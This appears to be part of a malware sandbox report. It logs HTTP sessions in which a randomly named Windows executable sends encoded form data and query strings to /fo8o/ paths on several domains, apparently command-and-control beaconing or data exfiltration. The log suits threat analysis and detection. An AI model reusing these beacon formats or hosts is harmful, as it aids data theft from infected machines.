                                                                                    Data Ascii: FPJps=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
Jan 7, 2025 15:32:51.192833900 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:50 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49917 | 116.50.37.244 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 15:32:52.846255064 CET | 1838 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a [TRUNCATED]
                                                                                    Data Ascii: FPJps=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykjxVF [TRUNCATED]
Jan 7, 2025 15:32:53.748708010 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:53 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49933 | 116.50.37.244 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 15:32:55.377645016 CET | 526 | OUT | GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 7, 2025 15:32:56.244842052 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:55 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49981 | 85.159.66.93 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 15:33:09.448369026 CET | 780 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d
                                                                                    Data Ascii: FPJps=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


                                                                                    Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49982 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp: Jan 7, 2025 15:33:11.990180969 CET | Bytes transferred: 800 | Direction: OUT
                                                                                    POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


                                                                                    Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49983 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp: Jan 7, 2025 15:33:14.527900934 CET | Bytes transferred: 1817 | Direction: OUT
                                                                                    POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps= [TRUNCATED]


                                                                                    Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49984 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp: Jan 7, 2025 15:33:17.065604925 CET | Bytes transferred: 519 | Direction: OUT
                                                                                    GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.magmadokum.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Timestamp: Jan 7, 2025 15:34:17.781847954 CET | Bytes transferred: 194 | Direction: IN
                                                                                    HTTP/1.0 504 Gateway Time-out
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                    Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49985 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp: Jan 7, 2025 15:34:22.822089911 CET | Bytes transferred: 783 | Direction: OUT
                                                                                    POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
                                                                                    Timestamp: Jan 7, 2025 15:34:23.472903967 CET | Bytes transferred: 707 | Direction: IN
                                                                                    HTTP/1.1 405 Not Allowed
                                                                                    date: Tue, 07 Jan 2025 14:34:23 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49986 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp: Jan 7, 2025 15:34:25.347731113 CET | Bytes transferred: 803 | Direction: OUT
                                                                                    POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                    Timestamp: Jan 7, 2025 15:34:25.983161926 CET | Bytes transferred: 707 | Direction: IN
                                                                                    HTTP/1.1 405 Not Allowed
                                                                                    date: Tue, 07 Jan 2025 14:34:25 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49987 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp: Jan 7, 2025 15:34:27.877615929 CET | Bytes transferred: 1820 | Direction: OUT
                                                                                    POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps= [TRUNCATED]
                                                                                    Timestamp: Jan 7, 2025 15:34:28.602495909 CET | Bytes transferred: 707 | Direction: IN
                                                                                    HTTP/1.1 405 Not Allowed
                                                                                    date: Tue, 07 Jan 2025 14:34:28 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49988 | Destination IP: 91.195.240.94 | Destination Port: 80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp: Jan 7, 2025 15:34:30.412012100 CET | Bytes transferred: 520 | Direction: OUT
                                                                                    GET /fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.rssnewscast.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Timestamp: Jan 7, 2025 15:34:31.104907990 CET | Bytes transferred: 1236 | Direction: IN
                                                                                    HTTP/1.1 200 OK
                                                                                    date: Tue, 07 Jan 2025 14:34:31 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_lFvCFF1qxSaEiSC2Zshe5fpXOGFnnyTzACxwsZoHWW3uY42g9RxPvh3H6Cfl/Tn2oo/7/M4eq2DErri2E0h8Zw==
                                                                                    last-modified: Tue, 07 Jan 2025 14:34:30 GMT
                                                                                    x-cache-miss-from: parking-7df97dc48-wnnqn
                                                                                    server: Parking/1.0
                                                                                    connection: close
